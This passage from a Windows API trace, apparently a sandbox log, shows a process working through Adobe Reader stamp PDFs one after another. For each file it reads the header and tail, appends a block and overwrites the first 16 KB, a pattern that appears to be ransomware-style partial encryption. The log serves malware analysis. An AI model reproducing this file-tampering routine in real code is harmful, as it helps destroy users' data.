lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0062.169] CloseHandle (hObject=0x1cc) returned 1 [0062.232] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\Hanko.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\chs\\hanko.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0062.233] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0062.233] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xaf90 [0062.233] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0062.233] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.233] ReleaseMutex (hMutex=0x168) returned 1 [0062.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hanko.pdf", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0062.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hanko.pdf", cchWideChar=9, lpMultiByteStr=0x1f733cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hanko.pdf", lpUsedDefaultChar=0x0) returned 9 [0062.234] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ec1538, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0062.240] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x9f90 [0062.240] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.241] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x9f90 [0062.241] WriteFile (in: hFile=0x1cc, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.242] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0062.242] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.242] CloseHandle (hObject=0x1cc) returned 1 [0062.247] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cze\\faces.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0062.248] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0062.248] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x8770 [0062.248] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0062.248] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.248] ReleaseMutex (hMutex=0x168) returned 1 [0062.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Faces.pdf", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0062.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Faces.pdf", cchWideChar=9, lpMultiByteStr=0x1f7358c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Faces.pdf", lpUsedDefaultChar=0x0) returned 9 [0062.249] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ec1538, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0062.443] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x7770 [0062.443] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.444] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x7770 [0062.444] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e92648*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e92648*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.444] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0062.444] WriteFile (in: hFile=0x1cc, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.445] CloseHandle (hObject=0x1cc) returned 1 [0062.450] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\deu\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0062.451] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0062.451] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xcadf [0062.451] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0062.451] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.451] ReleaseMutex (hMutex=0x168) returned 1 [0062.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0062.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x1f7356c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dynamic.pdf", lpUsedDefaultChar=0x0) returned 11 [0062.452] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0062.454] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xbadf [0062.454] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.455] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xbadf [0062.455] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e92648*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e92648*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.456] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0062.456] WriteFile (in: hFile=0x1cc, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.457] CloseHandle (hObject=0x1cc) returned 1 [0062.458] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\esp\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0062.459] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0062.459] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x9a88d [0062.459] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0062.459] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.459] ReleaseMutex (hMutex=0x168) returned 1 [0062.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0062.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x1f88ba4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardBusiness.pdf", lpUsedDefaultChar=0x0) returned 20 [0062.460] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0062.462] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.464] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x9988d [0062.464] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.466] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x9988d [0062.467] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e92648*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e92648*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.467] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0062.467] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0062.467] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0062.468] CloseHandle (hObject=0x1cc) returned 1 [0062.658] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\fra\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0062.659] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0062.659] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x9d75 [0062.659] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0062.659] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.659] ReleaseMutex (hMutex=0x168) returned 1 [0062.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0062.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x1f7340c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignHere.pdf", lpUsedDefaultChar=0x0) returned 12 [0062.659] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ec1538, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0062.661] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x8d75 [0062.661] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ec1538, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.662] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x8d75 [0062.663] WriteFile (in: hFile=0x1cc, lpBuffer=0x269dd48*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x269dd48*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.663] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0062.663] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.664] CloseHandle (hObject=0x1cc) returned 1 [0062.666] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hun\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0062.668] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0062.668] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xbb3e [0062.668] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0062.668] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.669] ReleaseMutex (hMutex=0x168) returned 1 [0062.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0062.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x1f7320c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dynamic.pdf", lpUsedDefaultChar=0x0) returned 11 [0062.669] ReadFile (in: hFile=0x1cc, lpBuffer=0x2666a38, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0062.697] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xab3e [0062.697] ReadFile (in: hFile=0x1cc, lpBuffer=0x2666a38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.711] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xab3e [0062.711] WriteFile (in: hFile=0x1cc, lpBuffer=0x269dc48*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x269dc48*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.712] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0062.712] WriteFile (in: hFile=0x1cc, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.713] CloseHandle (hObject=0x1cc) returned 1 [0062.740] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ita\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0062.740] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0062.740] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x18575 [0062.740] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0062.740] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.741] ReleaseMutex (hMutex=0x168) returned 1 [0062.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0062.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x1f88ba4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardBusiness.pdf", lpUsedDefaultChar=0x0) returned 20 [0062.741] ReadFile (in: hFile=0x1cc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0062.762] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x17575 [0062.762] ReadFile (in: hFile=0x1cc, lpBuffer=0x269dc48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x269dc48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.786] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x17575 [0062.787] WriteFile (in: hFile=0x1cc, lpBuffer=0x2692be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2692be8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.787] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0062.787] WriteFile (in: hFile=0x1cc, lpBuffer=0x2699c18*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2699c18*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.787] CloseHandle (hObject=0x1cc) returned 1 [0062.789] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\kor\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0062.790] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0062.790] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x24f7f [0062.790] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0062.790] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.790] ReleaseMutex (hMutex=0x168) returned 1 [0062.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0062.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x1f88ba4, cbMultiByte=20, 